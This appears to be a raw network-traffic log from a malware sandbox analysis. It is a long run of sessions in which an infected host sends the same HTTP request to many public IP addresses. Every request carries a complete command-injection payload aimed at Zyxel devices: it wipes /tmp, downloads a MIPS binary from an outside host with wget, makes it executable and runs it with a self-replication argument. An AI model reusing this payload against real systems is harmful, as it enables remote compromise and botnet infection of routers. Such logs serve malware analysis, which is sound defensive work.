                              Mar 31, 2024 08:41:29.888273001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4885192.168.2.133649635.190.75.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888293028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4886192.168.2.135881099.86.96.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888331890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4887192.168.2.1360758218.82.36.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888365984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4888192.168.2.1338250218.111.242.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888402939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4889192.168.2.135631059.228.169.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888442993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4890192.168.2.1348318145.106.250.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888472080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4891192.168.2.135518285.138.215.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888492107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4892192.168.2.1333808164.208.28.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888555050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4893192.168.2.1341160115.61.138.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888603926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4894192.168.2.133389081.182.98.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888637066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4895192.168.2.133862658.22.10.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888679981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4896192.168.2.1352500192.131.210.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888729095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4897192.168.2.1352316183.100.35.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888753891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4898192.168.2.134316691.65.121.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888813019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4899192.168.2.1347782194.127.25.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888844967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4900192.168.2.134879217.84.100.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888890028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4901192.168.2.135005240.24.184.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888917923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4902192.168.2.1341502178.240.144.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888983965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4903192.168.2.135067894.130.234.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889009953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4904192.168.2.1352192193.241.153.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889045000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4905192.168.2.136034613.62.59.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889081001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4906192.168.2.1336560220.251.153.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889107943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4907192.168.2.1340094213.164.53.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889136076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4908192.168.2.133504450.92.33.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889202118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4909192.168.2.1347786136.246.147.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889229059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4910192.168.2.1356880166.254.112.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889283895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4911192.168.2.1334552167.82.26.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889324903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4912192.168.2.1347554129.30.188.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889342070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4913192.168.2.1342540150.248.196.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889405966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4914192.168.2.1359938120.227.127.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889465094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4915192.168.2.1344508103.160.109.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889480114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4916192.168.2.1347582120.123.117.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889480114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4917192.168.2.1338262196.103.186.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889573097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4918192.168.2.1347186162.164.100.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889575005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4919192.168.2.1332918142.34.51.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889604092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4920192.168.2.1353908102.211.245.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889663935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4921192.168.2.1343958160.246.74.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889683962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4922192.168.2.1360814111.91.228.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889743090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4923192.168.2.1341368199.67.105.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889791012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4924192.168.2.133599238.4.55.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889816046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4925192.168.2.134498476.242.148.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889884949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4926192.168.2.134844884.104.101.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889894962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4927192.168.2.1337582202.3.139.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889945030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4928192.168.2.133723241.167.246.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.889977932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4929192.168.2.1354174193.43.130.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890013933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4930192.168.2.1338622117.182.216.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890075922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4931192.168.2.135628298.186.150.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890093088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4932192.168.2.1360438142.21.164.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890150070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4933192.168.2.1360530185.144.72.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890187979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4934192.168.2.134309240.149.29.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890227079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4935192.168.2.135819848.171.190.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890284061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4936192.168.2.1353316193.185.177.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890300035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4937192.168.2.133638250.216.208.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890358925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4938192.168.2.1338804179.112.243.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890387058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4939192.168.2.1360604109.219.93.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890458107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4940192.168.2.1350652201.44.110.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890464067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4941192.168.2.1332798155.24.197.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890496969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4942192.168.2.134846847.53.106.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890548944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4943192.168.2.1359984164.43.65.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890599012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4944192.168.2.135677296.239.129.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890625954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4945192.168.2.1333234187.53.188.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890675068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4946192.168.2.1349612131.95.219.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890748978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4947192.168.2.1334662158.175.120.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890777111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4948192.168.2.133464088.167.176.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890827894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4949192.168.2.135662489.207.160.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890861988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4950192.168.2.1337406102.123.5.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890889883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4951192.168.2.133924874.129.231.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890971899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4952192.168.2.134935839.146.165.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.890990973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4953192.168.2.135676620.14.123.83443
                              TimestampBytes transferredDirectionData
